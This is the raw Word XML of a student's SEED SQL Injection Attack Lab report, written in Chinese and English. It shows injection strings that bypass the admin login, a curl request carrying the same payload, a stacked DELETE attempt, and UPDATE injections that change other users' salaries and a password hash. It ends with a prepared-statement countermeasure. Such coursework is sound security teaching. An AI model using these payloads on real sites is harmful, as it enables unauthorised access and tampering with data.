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1F6C8" w14:textId="1A02F097" w:rsidR="00DE1F7A" w:rsidRPr="008B6B9E" w:rsidRDefault="008B6B9E" w:rsidP="008B6B9E">
      <w:pPr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8B6B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>SQL Injection Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD48381" w14:textId="2E8FB3ED" w:rsidR="008B6B9E" w:rsidRDefault="008B6B9E" w:rsidP="008B6B9E">
      <w:pPr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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F653ED" w14:textId="22076D41" w:rsidR="008B6B9E" w:rsidRDefault="008B6B9E" w:rsidP="008B6B9E">
      <w:pPr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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">7118112 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>王怡乐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F72883" w14:textId="4B7CFE4F" w:rsidR="008B6B9E" w:rsidRDefault="008B6B9E" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Task 1: Get Familiar with SQL Statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153505D4" w14:textId="18F8BCDB" w:rsidR="00101E8D" w:rsidRPr="00101E8D" w:rsidRDefault="00101E8D" w:rsidP="008B6B9E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查看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lice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F52219" w14:textId="1971CF77" w:rsidR="00E85F85" w:rsidRDefault="00E85F85" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi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6966579" wp14:editId="34E0A437">
            <wp:extent cx="5274310" cy="3681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BAA8" w14:textId="77777777" w:rsidR="00101E8D" w:rsidRDefault="00101E8D" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1AF998" w14:textId="365A48D9" w:rsidR="00BF0794" w:rsidRDefault="00BF0794" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF0794">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Task 2: SQL Injection Attack on SELECT Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A977C3" w14:textId="6E75A23C" w:rsidR="00BF0794" w:rsidRDefault="00BF0794" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF0794">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 2.1: SQL Injection Attack from webpage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DDC485" w14:textId="13A2BB39" w:rsidR="00101E8D" w:rsidRPr="00101E8D" w:rsidRDefault="00101E8D" w:rsidP="008B6B9E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向</w:t>
      </w:r>
      <w:r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>sername</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栏中输入如图所示内容，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assword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栏中任意，成功登录管理员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dmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D250B2C" w14:textId="0C181375" w:rsidR="00BF0794" w:rsidRPr="00BF0794" w:rsidRDefault="00BF0794" w:rsidP="00BF0794">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF0794">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59911024" wp14:editId="740C0491">
            <wp:extent cx="5274310" cy="36817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2185" w14:textId="64F539B2" w:rsidR="00BF0794" w:rsidRDefault="00BF0794" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi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0B4F4049" wp14:editId="53F342E6">
            <wp:extent cx="5274310" cy="3672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4026" w14:textId="2DB0CD85" w:rsidR="00101E8D" w:rsidRDefault="00101E8D" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C92761" w14:textId="29F899B1" w:rsidR="00101E8D" w:rsidRDefault="00101E8D" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412CF30B" w14:textId="77777777" w:rsidR="00101E8D" w:rsidRDefault="00101E8D" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A46C46E" w14:textId="56C95B10" w:rsidR="00B36056" w:rsidRDefault="00B36056" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36056">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2.2: SQL Injection Attack from command line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD1C5D" w14:textId="0BB02C46" w:rsidR="004260DE" w:rsidRDefault="009979ED" w:rsidP="009979ED">
      <w:pPr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终端输入：</w:t>
      </w:r>
      <w:r w:rsidR="003D672E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="004260DE" w:rsidRPr="004260DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidR="003D672E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004260DE" w:rsidRPr="004260DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>'www.SEEDLabSQLInjection.com/unsafe_home.php?username=admin%27%23&amp;Password='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2BAF2A" w14:textId="58C59CC4" w:rsidR="009979ED" w:rsidRDefault="009979ED" w:rsidP="008B6B9E">
      <w:pPr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01BFDD8" wp14:editId="10C14479">
            <wp:extent cx="4633783" cy="3371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15" cy="337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4F7F" w14:textId="322BA5D6" w:rsidR="00B36056" w:rsidRDefault="00B36056" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F85CF65" w14:textId="330AA5F2" w:rsidR="00B36056" w:rsidRDefault="00B36056" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36056">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Task 2.3: Append a new SQL statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA4F91" w14:textId="62F348D2" w:rsidR="00814614" w:rsidRDefault="00814614" w:rsidP="00101E8D">
      <w:pPr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登录页面的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>ame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栏中输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00814614">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>admin';DELETE * FROM credential WHERE Name='alice';#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A1AC374" wp14:editId="6C5331F1">
            <wp:extent cx="4622800" cy="3219152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771" cy="32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98A0" w14:textId="52CC8D55" w:rsidR="00101E8D" w:rsidRDefault="00101E8D" w:rsidP="00101E8D">
      <w:pPr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显示攻击不成功。这是因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>uery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数不支持执行多个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QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154ED295" w14:textId="1063E6E2" w:rsidR="00814614" w:rsidRDefault="00814614" w:rsidP="008B6B9E">
      <w:pPr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3A51EEA" wp14:editId="2C19BBB7">
            <wp:extent cx="4686300" cy="32633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0096" cy="32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2592" w14:textId="1EB73818" w:rsidR="00D37927" w:rsidRDefault="00D37927" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EFB354" w14:textId="7389EFF2" w:rsidR="00D37927" w:rsidRDefault="00D37927" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37927">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Task 3: SQL Injection Attack on UPDATE Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC71ACB" w14:textId="37AEF4D4" w:rsidR="006A702A" w:rsidRDefault="006A702A" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A702A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 3.1: Modify your own salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF32F86" w14:textId="5010FC00" w:rsidR="006A702A" w:rsidRDefault="00EF33AC" w:rsidP="001C083F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk51427114"/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>i</w:t>
      </w:r>
      <w:r w:rsidR="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栏中输入：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="006A702A" w:rsidRPr="006A702A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>',salary='100000' where eid='10000'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2007E263" w14:textId="36A0647E" w:rsidR="00905E59" w:rsidRDefault="00905E59" w:rsidP="008B6B9E">
      <w:pPr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DA9962" wp14:editId="3A3AE93E">
            <wp:extent cx="4273770" cy="327676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226C" w14:textId="77777777" w:rsidR="009979ED" w:rsidRDefault="001C083F" w:rsidP="008B6B9E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142805A" w14:textId="77777777" w:rsidR="009979ED" w:rsidRDefault="009979ED" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="555D72B6" w14:textId="77777777" w:rsidR="009979ED" w:rsidRDefault="009979ED" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="423BFD1B" w14:textId="4F42EBD0" w:rsidR="001C083F" w:rsidRPr="006A702A" w:rsidRDefault="001C083F" w:rsidP="009979ED">
      <w:pPr>
        <w:ind w:firstLine="420"/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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工资被更改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A48EE9" w14:textId="4EAFE1D6" w:rsidR="001C083F" w:rsidRDefault="006A702A" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"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5445BDA" wp14:editId="2FC3DA10">
            <wp:extent cx="5274310" cy="23844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54BD" w14:textId="721C821E" w:rsidR="00D33D2E" w:rsidRDefault="00D33D2E" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D33D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 3.2: Modify other people’ salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB8B907" w14:textId="12B6C62B" w:rsidR="00D33D2E" w:rsidRDefault="001C083F" w:rsidP="009979ED">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ickName</w:t>
      </w:r>
      <w:r w:rsidRPr="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>栏中输入：</w:t>
      </w:r>
      <w:r w:rsidR="00D33D2E" w:rsidRPr="00D33D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>',salary='1' where eid='20000'#</w:t>
      </w:r>
      <w:r w:rsidR="00905E59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45459B64" wp14:editId="486C84E1">
            <wp:extent cx="3014481" cy="2717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5888" cy="27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1E0A" w14:textId="1266C15D" w:rsidR="001C083F" w:rsidRDefault="001C083F" w:rsidP="008B6B9E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  <w:t>Boby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工资被更改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9D65B" w14:textId="3AFD7463" w:rsidR="00D33D2E" w:rsidRDefault="00D33D2E" w:rsidP="008B6B9E">
      <w:pPr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F5D674E" wp14:editId="2373F193">
            <wp:extent cx="5274310" cy="23793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D468" w14:textId="487CAE58" w:rsidR="00BD39A2" w:rsidRDefault="00BD39A2" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD39A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3.3: Modify other people’ password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72393BAF" w14:textId="3C6C7615" w:rsidR="00BD39A2" w:rsidRDefault="00BD39A2" w:rsidP="008B6B9E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首先获得新密码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00919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HA1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FADF1E" w14:textId="0B14C715" w:rsidR="00BD39A2" w:rsidRDefault="00BD39A2" w:rsidP="008B6B9E">
      <w:pPr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BD8BE1D" wp14:editId="7AE94859">
            <wp:extent cx="5274310" cy="9677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8CD9" w14:textId="06329684" w:rsidR="001C083F" w:rsidRDefault="001C083F" w:rsidP="008B6B9E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</w:p>
    <w:p w14:paraId="05A0E62B" w14:textId="0B6651A7" w:rsidR="001C083F" w:rsidRDefault="001C083F" w:rsidP="009979ED">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ickName</w:t>
      </w:r>
      <w:r w:rsidRPr="001C083F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>栏中输入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0ABF12" w14:textId="3CCA50A1" w:rsidR="00BD39A2" w:rsidRDefault="00BD39A2" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD39A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>',password='2a7a744ae9d7bd0c924952be68bc884e982eb4fa' where eid='20000'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38840742" w14:textId="13717E13" w:rsidR="00905E59" w:rsidRDefault="00905E59" w:rsidP="008B6B9E">
      <w:pPr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4724073" wp14:editId="69FD5D88">
            <wp:extent cx="2889250" cy="2605062"/>
            <wp:effectExtent l="0" t="0" r="635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2407" cy="26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5800" w14:textId="09460060" w:rsidR="001C083F" w:rsidRDefault="001C083F" w:rsidP="008B6B9E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用新密码登录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oby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的账号，成功登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E732ABF" w14:textId="5B8F175C" w:rsidR="001C083F" w:rsidRDefault="00BD39A2" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/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251A9E13" wp14:editId="2112713E">
            <wp:extent cx="4878126" cy="3549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245" cy="355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C444" w14:textId="1EA23CA4" w:rsidR="009A3F7A" w:rsidRDefault="009A3F7A" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3F7A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: Countermeasure — Prepared Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD2988" w14:textId="13078991" w:rsidR="001C083F" w:rsidRPr="001C083F" w:rsidRDefault="001C083F" w:rsidP="008B6B9E">
      <w:pPr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查看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/>
        </w:rPr>
        <w:t>var/www/SQLInjection/safe_home.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，发现是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>prepared statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282FAD9" w14:textId="23352DC2" w:rsidR="001C083F" w:rsidRDefault="001C083F" w:rsidP="008B6B9E">
      <w:pPr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D64747" wp14:editId="0B8F970B">
            <wp:extent cx="5274310" cy="18364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696C" w14:textId="551B88B7" w:rsidR="00D16B13" w:rsidRDefault="001C083F" w:rsidP="001C083F">
      <w:pPr>
        <w:ind w:left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打开网址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00F805F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>www.seedlabsqlinjection.com/safe_home.php?username=admin'#&amp;Password=</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C58C985" w14:textId="453EDB17" w:rsidR="001C083F" w:rsidRPr="00D16B13" w:rsidRDefault="001C083F" w:rsidP="001C083F">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:jc w:val="left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攻击不成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE6ECE" w14:textId="417EDCA3" w:rsidR="00D16B13" w:rsidRDefault="00D16B13" w:rsidP="008B6B9E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C2AB1D" wp14:editId="454721D9">
